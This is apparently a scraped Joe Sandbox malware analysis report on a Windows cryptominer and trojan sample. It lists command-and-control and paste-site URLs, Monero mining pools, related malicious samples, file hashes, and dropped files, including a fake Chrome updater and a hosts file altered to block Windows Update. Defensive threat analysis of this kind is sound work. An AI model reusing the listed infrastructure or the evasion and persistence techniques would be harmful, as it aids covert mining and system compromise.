          http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
          https://justpaste.it/f86v11%VirustotalBrowse
          https://github.com/Pester/Pester1%VirustotalBrowse
          https://pastebin.com/raw/sFxN07Y71%VirustotalBrowse
          https://rentry.co/5apf98os/raw1%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          justpaste.it
          		83.168.108.45
          		truetrueunknown
          pool-fr.supportxmr.com
          		141.94.96.71
          		truefalseunknown
          jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su
          		188.114.97.3
          		truetrueunknown
          rentry.co
          		104.26.3.16
          		truetrueunknown
          pastebin.com
          		172.67.19.24
          		truetrueunknown
          pool.supportxmr.com
          		unknown
          		unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://pastebin.com/raw/sFxN07Y7falseunknown
          https://jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su/api/endpoint.phptrue
            		unknown
            https://justpaste.it/f86v1falseunknown
            https://rentry.co/5apf98os/rawfalseunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://go.microsoft.coPpowershell.exe, 0000001D.00000002.2254826196.00000217EEEFC000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 0000001D.00000002.2244051114.00000217E6C65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://crl.thawte.com/ThawteTimestampingCA.crl0updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001D.00000002.2211112447.00000217D6C7C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001D.00000002.2211112447.00000217D6C7C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://go.micropowershell.exe, 0000001D.00000002.2211112447.00000217D7B9A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://ocsp.thawte.com0updater.exe, 00000025.00000003.2206433756.0000017ADE760000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/powershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 0000001D.00000002.2244051114.00000217E6AC0000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://aka.ms/pscore68powershell.exe, 0000001D.00000002.2211112447.00000217D6A51000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001D.00000002.2211112447.00000217D6A51000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://github.com/Pester/Pesterpowershell.exe, 0000001D.00000002.2211112447.00000217D6C7C000.00000004.00000800.00020000.00000000.sdmpfalseunknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              104.26.3.16
              		rentry.coUnited States
              		13335CLOUDFLARENETUStrue
              83.168.108.45
              		justpaste.itPoland
              		31304ESPOL-ASPLtrue
              172.67.19.24
              		pastebin.comUnited States
              		13335CLOUDFLARENETUStrue
              188.114.97.3
              		jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.suEuropean Union
              		13335CLOUDFLARENETUStrue
              141.94.96.144
              		unknownGermany
              		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1530444
              Start date and time:2024-10-10 04:55:07 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 11m 36s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:68
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:6
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:egFMhHSlmf.exe
              renamed because original name is a hash value
              Original Sample Name:1417d38c40d85d1c4eb7fad3444ca069.exe
              Detection:MAL
              Classification:mal100.troj.adwa.spyw.evad.mine.winEXE@97/17@5/5
              EGA Information:
              • Successful, ratio: 86.7%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
              • Excluded IPs from analysis (whitelisted): 40.126.32.140, 20.190.160.22, 40.126.32.133, 20.190.160.17, 20.190.160.20, 20.190.160.14, 40.126.32.68, 40.126.32.76
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
              • Execution Graph export aborted for target egFMhHSlmf.exe, PID 1764 because it is empty
              • Execution Graph export aborted for target updater.exe, PID 5712 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              22:55:57API Interceptor1x Sleep call for process: egFMhHSlmf.exe modified
              22:55:59API Interceptor59x Sleep call for process: powershell.exe modified
              22:56:38API Interceptor454331x Sleep call for process: winlogon.exe modified
              22:56:39API Interceptor361241x Sleep call for process: lsass.exe modified
              22:56:40API Interceptor665x Sleep call for process: svchost.exe modified
              22:56:41API Interceptor437583x Sleep call for process: dwm.exe modified
              22:56:48API Interceptor315x Sleep call for process: dllhost.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.26.3.16SecuriteInfo.com.Win64.TrojanX-gen.20834.9882.exeGet hashmaliciousUnknownBrowse
                4wx72yFLka.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                  quotation.jsGet hashmaliciousUnknownBrowse
                    Quote.jsGet hashmaliciousUnknownBrowse
                      SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Win64.MalwareX-gen.11541.5330.exeGet hashmaliciousUnknownBrowse
                          SecuriteInfo.com.Win64.MalwareX-gen.9087.16441.exeGet hashmaliciousUnknownBrowse
                            CV.vbsGet hashmaliciousXmrigBrowse
                              system47.exeGet hashmaliciousXWormBrowse
                                file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                  83.168.108.45updater.exeGet hashmaliciousXmrigBrowse
                                    172.67.19.24envifa.vbsGet hashmaliciousUnknownBrowse
                                    • pastebin.com/raw/V9y5Q5vv
                                    sostener.vbsGet hashmaliciousRemcosBrowse
                                    • pastebin.com/raw/V9y5Q5vv
                                    Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                    • pastebin.com/raw/NsQ5qTHr
                                    Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                    • pastebin.com/raw/NsQ5qTHr
                                    Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                    • pastebin.com/raw/NsQ5qTHr
                                    PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                    • pastebin.com/raw/NsQ5qTHr
                                    188.114.97.3octux.exe.exeGet hashmaliciousUnknownBrowse
                                    • servicetelemetryserver.shop/api/index.php
                                    1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exeGet hashmaliciousFormBookBrowse
                                    • www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
                                    BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                    • www.launchdreamidea.xyz/bd77/
                                    http://embittermentdc.comGet hashmaliciousUnknownBrowse
                                    • embittermentdc.com/favicon.ico
                                    scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                    • paste.ee/d/gvOd3
                                    IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                    • www.bayarcepat19.click/yuvr/
                                    Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                    • www.cc101.pro/0r21/
                                    http://www.thegulfthermale.com.tr/antai/12/3dsec.phpGet hashmaliciousUnknownBrowse
                                    • www.thegulfthermale.com.tr/antai/12/3dsec.php
                                    QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                    • filetransfer.io/data-package/eZFzMENr/download
                                    QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • filetransfer.io/data-package/MlZtCPkK/download

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    rentry.cox2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                    • 172.67.75.40
                                    SecuriteInfo.com.Win64.TrojanX-gen.20834.9882.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.75.40
                                    MPX283rT19.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                    • 104.26.2.16
                                    f2q2w9rTqd.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                    • 104.26.2.16
                                    file.exeGet hashmaliciousXWormBrowse
                                    • 104.26.2.16
                                    yhDRFwEXdd.cmdGet hashmaliciousUnknownBrowse
                                    • 172.67.75.40
                                    4wx72yFLka.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                                    • 104.26.3.16
                                    0U9NY2PzhK.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                                    • 172.67.75.40
                                    qlk8old6p9.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                                    • 172.67.75.40
                                    quotation.jsGet hashmaliciousUnknownBrowse
                                    • 104.26.3.16
                                    pastebin.comQuotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                    • 104.20.4.235
                                    eshkere.batGet hashmaliciousXmrigBrowse
                                    • 104.20.4.235
                                    frik.exeGet hashmaliciousXmrigBrowse
                                    • 104.20.3.235
                                    Google Chrome.exeGet hashmaliciousXmrigBrowse
                                    • 172.67.19.24
                                    SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exeGet hashmaliciousUnknownBrowse
                                    • 104.20.4.235
                                    SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.19.24
                                    SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.19.24
                                    SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.19.24
                                    Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                    • 104.20.4.235
                                    Urgent Purchase Order (P.O.) No.477764107102024.vbsGet hashmaliciousRemcosBrowse
                                    • 172.67.19.24
                                    justpaste.itPayment Advice.pdf.jsGet hashmaliciousRemcosBrowse
                                    • 178.159.12.230
                                    updater.exeGet hashmaliciousXmrigBrowse
                                    • 83.168.108.45
                                    msdx - Linkvertise Downloader_WRu-MP1.exeGet hashmaliciousUnknownBrowse
                                    • 51.83.143.177
                                    skybl - Linkvertise Downloader_H-oDPb1.exeGet hashmaliciousUnknownBrowse
                                    • 51.83.143.177
                                    mdx - Linkvertise Downloader_Ou-Vm51.exeGet hashmaliciousUnknownBrowse
                                    • 51.83.143.177
                                    y99ZI1Kjg8.exeGet hashmaliciousUnknownBrowse
                                    • 51.83.143.177
                                    QP6s4u5SZ8.exeGet hashmaliciousUnknownBrowse
                                    • 51.83.143.177
                                    pool-fr.supportxmr.comxmr_linux_amd64 (2).elfGet hashmaliciousXmrigBrowse
                                    • 141.94.96.195
                                    xmr_linux_amd64.elfGet hashmaliciousXmrigBrowse
                                    • 141.94.96.195
                                    SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeGet hashmaliciousXmrigBrowse
                                    • 141.94.96.144
                                    Q3pEXxmWAD.exeGet hashmaliciousXmrigBrowse
                                    • 141.94.96.195
                                    file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                    • 141.94.96.71
                                    kWYLtJ0Cn1.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                    • 141.94.96.195
                                    updater.exeGet hashmaliciousXmrigBrowse
                                    • 141.94.96.71
                                    xjSglbp263.exeGet hashmaliciousXmrigBrowse
                                    • 141.94.96.71
                                    gwRQinPOHB.exeGet hashmaliciousXmrigBrowse
                                    • 141.94.96.195
                                    FieroHack.exeGet hashmaliciousXmrigBrowse
                                    • 141.94.96.195

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUShttps://embassyatlantahub.com/res444.php?4-68747470733a2f2f632e7468696d65726e65742e636f6d2f623174462f-#mGet hashmaliciousUnknownBrowse
                                    • 104.17.25.14
                                    http://www.cottesloecounselling.com.au/anna-amhrose.htmlGet hashmaliciousUnknownBrowse
                                    • 104.21.23.227
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.206.204
                                    octux.exe.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    octux.exe.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    https://link.edgepilot.com/s/a60b2ad0/3dLZ9fawZkK45-vRV49QDQ?u=https://accounts.timesoftint.com/Get hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.206.204
                                    https://qrco.de/bfSzSwGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    https://urlr.me/mqbyfGet hashmaliciousUnknownBrowse
                                    • 104.17.25.14
                                    1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exeGet hashmaliciousFormBookBrowse
                                    • 188.114.97.3
                                    ESPOL-ASPLfirmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                    • 83.168.127.215
                                    WizDKOmtwf.elfGet hashmaliciousMiraiBrowse
                                    • 83.168.87.155
                                    updater.exeGet hashmaliciousXmrigBrowse
                                    • 83.168.108.45
                                    SecuriteInfo.com.FileRepMalware.26928.28691.exeGet hashmaliciousUnknownBrowse
                                    • 83.168.106.22
                                    x86.elfGet hashmaliciousMiraiBrowse
                                    • 83.168.127.232
                                    hbqK0qfLnv.elfGet hashmaliciousMiraiBrowse
                                    • 83.168.127.254
                                    XBiCfJromk.elfGet hashmaliciousMiraiBrowse
                                    • 83.168.87.139
                                    5WJ15l9QBi.elfGet hashmaliciousMirai, GafgytBrowse
                                    • 83.168.87.158
                                    sora.arm.elfGet hashmaliciousMiraiBrowse
                                    • 83.168.127.248
                                    mipsel-20230709-1219.elfGet hashmaliciousUnknownBrowse
                                    • 83.168.87.114
                                    CLOUDFLARENETUShttps://embassyatlantahub.com/res444.php?4-68747470733a2f2f632e7468696d65726e65742e636f6d2f623174462f-#mGet hashmaliciousUnknownBrowse
                                    • 104.17.25.14
                                    http://www.cottesloecounselling.com.au/anna-amhrose.htmlGet hashmaliciousUnknownBrowse
                                    • 104.21.23.227
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.206.204
                                    octux.exe.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    octux.exe.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    https://link.edgepilot.com/s/a60b2ad0/3dLZ9fawZkK45-vRV49QDQ?u=https://accounts.timesoftint.com/Get hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.206.204
                                    https://qrco.de/bfSzSwGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    https://urlr.me/mqbyfGet hashmaliciousUnknownBrowse
                                    • 104.17.25.14
                                    1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exeGet hashmaliciousFormBookBrowse
                                    • 188.114.97.3
                                    CLOUDFLARENETUShttps://embassyatlantahub.com/res444.php?4-68747470733a2f2f632e7468696d65726e65742e636f6d2f623174462f-#mGet hashmaliciousUnknownBrowse
                                    • 104.17.25.14
                                    http://www.cottesloecounselling.com.au/anna-amhrose.htmlGet hashmaliciousUnknownBrowse
                                    • 104.21.23.227
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.206.204
                                    octux.exe.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    octux.exe.exeGet hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    https://link.edgepilot.com/s/a60b2ad0/3dLZ9fawZkK45-vRV49QDQ?u=https://accounts.timesoftint.com/Get hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 172.67.206.204
                                    https://qrco.de/bfSzSwGet hashmaliciousUnknownBrowse
                                    • 188.114.97.3
                                    https://urlr.me/mqbyfGet hashmaliciousUnknownBrowse
                                    • 104.17.25.14
                                    1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exeGet hashmaliciousFormBookBrowse
                                    • 188.114.97.3

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Windows\Temp\xptjtnajcbas.sysOTm8DpW32j.exeGet hashmaliciousXmrigBrowse
                                      zufmUwylvo.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                        zufmUwylvo.exeGet hashmaliciousXmrigBrowse
                                          0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                            eshkere.batGet hashmaliciousXmrigBrowse
                                              frik.exeGet hashmaliciousXmrigBrowse
                                                Google Chrome.exeGet hashmaliciousXmrigBrowse
                                                  e7WMhx18XN.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                                    GcqJPBLD2Q.exeGet hashmaliciousBitCoin Miner, SilentXMRMiner, UACMe, XmrigBrowse
                                                      C5Lg2JSPlD.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse

                                                        Created / dropped Files

                                                        C:\ProgramData\Google\Chrome\updater.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\egFMhHSlmf.exe
                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):5536856
                                                        Entropy (8bit):6.563142554876773
                                                        Encrypted:false
                                                        SSDEEP:98304:z0uVyIJFN+YjxW2q0pOFklpKRDArh51NuIQIi7by2ud3RK:QucIJbx9TOFkMOL1NuIQIi7by2uRRK
                                                        MD5:1417D38C40D85D1C4EB7FAD3444CA069
                                                        SHA1:27D8E2CA9537C80D1C1148830F9A6499F1E3E797
                                                        SHA-256:5F7C6CDEA3C4E825AF1D796CBD34B2D45B2B6FABED130E717A30A6D871993F5D
                                                        SHA-512:A169F8C5925977A984BC00A2B379205ED527777865215E4FFDFEB30084D1ED08F7BB5222DB8898161F1E6151D4A75E8CCC366543CF041E47EFFC21DCF4C351AB
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 74%
                                                        • Antivirus: Virustotal, Detection: 75%, Browse
                                                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......f....R.....@..........@..............................U...........`.....................................................<.....T.......T......dT.X.....U.x...............................(.......8...............x............................text....d.......f.................. ..`.rdata...^.......`...j..............@..@.data...h.R.......R.................@....pdata........T......XT.............@..@.00cfg........T......ZT.............@..@.tls..........T......\T.............@....rsrc.........T......^T.............@..@.reloc..x.....U......bT.............@..B........................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1940658735648508
                                                        Encrypted:false
                                                        SSDEEP:3:NlllulVmdtZ:NllUM
                                                        MD5:013016A37665E1E37F0A3576A8EC8324
                                                        SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                        SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                        SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                        Malicious:false
                                                        Preview:@...e................................................@..........

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bryyl1by.osu.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_es1dcfgj.lik.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ld2m0mz2.mmu.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_neubzoxx.u5e.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................

                                                        C:\Windows\System32\drivers\etc\hosts

                                                        Download File
                                                        Process:C:\Users\user\Desktop\egFMhHSlmf.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):3718
                                                        Entropy (8bit):4.256209152129098
                                                        Encrypted:false
                                                        SSDEEP:96:vDZEurK9TOx17pjxFoZ6MBJxBXliCWPRi4qnn54:RrK910
                                                        MD5:205365A533D1BD10A2AA09F064BCF995
                                                        SHA1:E89D17C50A9536CD3ED22E7E69799D99681EBF3B
                                                        SHA-256:A37B96845193EA17FD7D78F8E445A17A2A01755FFA9A9291F3085EF7483C5ABD
                                                        SHA-512:26C12D3422D733BBEA352BF07EE12FBC30153CBE3266B67005C24AC730746B818652CCF5850179BF3115BBEFAAED3FDB8713D6771F3925C79FFD418D5BF87C5A
                                                        Malicious:true
                                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 download.windowsupdate.com..0.0.0.0 .microsoft.com..0.0.0.0 .update.microsoft.com..0.0.0.0 .windowsupdate.com..0.0.0.0 *.windowsupda

                                                        C:\Windows\Temp\__PSScriptPolicyTest_1dcdm0g5.ytp.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
